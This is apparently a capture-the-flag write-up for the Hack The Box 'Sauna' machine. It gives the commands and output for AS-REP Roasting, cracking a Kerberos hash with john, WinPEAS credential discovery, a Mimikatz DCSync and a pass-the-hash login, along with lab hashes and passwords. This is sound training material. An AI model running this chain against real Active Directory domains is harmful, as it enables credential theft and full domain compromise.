Table of contents
Sauna is a great machine for sharpening your Active Directory skills.
To solve this machine, you have to properly enumerate the domain, and with a pinch of OSINT
, find the correct username.
The hash for the user might be captured by the AS-REP Roasting
attack.
To get the root
you have to escalate privileges by stepping aside to another account for the DCSync
attack.
The machine itself is pretty similar to the Forest, I tried to use a slightly different toolkit.
Toolkit
Impacket for AS-REP Roasting
Evil-WinRM to spawn shells and import scripts
PEASS for Privilege Escalation part
Mimikatz for getting the Admin hash
Enumeration
Checking all ports with -p-
flag:
nmap -sS -sV -p- 10.10.10.175
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-28 15:41 EDT
Nmap scan report for htb.local (10.10.10.175)
Host is up (0.022s latency).
Not shown: 65515 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-29 02:48:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49686/tcp open msrpc Microsoft Windows RPC
64265/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/28%Time=5E7FA986%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 395.84 seconds
Exploring port 80
you have to find the list of users. That part is a bit CTF-ish, but you need to know the correct username to perform the AS-REP Roasting attack.
Fergus Smith
Shaun Coins
Bowie Taylor
Sophie Driver
Hugo Bear
Steven Kerb
From those names, we're creating a list with common patterns used in AD.
Fergus Smith
might be represented as fsmith
, or Fergus.Smith
, or FerSm
, etc.
Exploitation
Firing up the Impacket
python3 GetNPUsers.py GOTISTICAL-BANK.LOCAL/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.175 -no-pass
We go a Kerberos
ticket for user fsmith
:
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:caa59cf44d7cbdadfe91940e4a9433b0$c541f3fb39f017ee166fbb87d5c5c02578c8e9d993b30442f63e5d13be3bbc34e73616ea851a40fbea5ddab5a11ab41c0d3712b73755528fed1ae059e72ea21742e7309540a42d5cbd56fa4fca0d4f69935eadcbcee8bb9a6351cbeb0d27552be9da2e2fd6aa3e3106c4d808c8c5da9e5384f5b59ca907a137e889ae84c8d29a97616c59d8a3f92d2afd738ba2e1896011198eb374dfabfeaa6caa35c3c7b9fb01edaecd52d77e6305896e170c7432b450e799226baa99c23c87ea0c334cbcfb0c9fee5f7217009fb51068d32c94cee0f9ca115045712c9e5abd3d926cb77c25487e617ac09a478195d2f6f20b8264846263cebef81a9248d362eb7497f91a6c
Cracking this hash with john
:
john --wordlist=./rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:18 DONE (2020-03-31 10:49) 0.05390g/s 568140p/s 568140c/s 568140C/s Thines..Thehulk2008
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Get the user flag with the Evil-WinRM
:
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
PrivEsc
One of my new favorite tools can handle the PrivEsc part - WinPEAS Windows Privilege Escalation Awesome Scripts
is a part of the toolkit named PEASS - Privilege Escalation Awesome Scripts SUITE
It can be easily imported by Evin-WinRM
by upload
function or by specifying -e
flag when you're starting a shell.
WinPEAS
discover some autologon credentials on the machine:
[+] Looking for AutoLogon credentials(T1012)
Some AutoLogon credentials were found!!
DefaultDomainName : 35mEGOTISTICALBANK
DefaultUserName : 35mEGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
Firing up another shell:
evil-winrm -i 10.10.10.175 -u svc_loanmgr -p Moneymakestheworldgoround!
It’s a great chance to try out a mimikatz
. And again, -e
or upload
to pass the exploit to the machine:
./mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
Mimikatz
will return the NTLM hash
for user Administrator
. The last step is to open another shell as the Administrator
. Evil-WinRM
have the -H
flag, it’s the same as Pass-the-Hash
attack:
evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff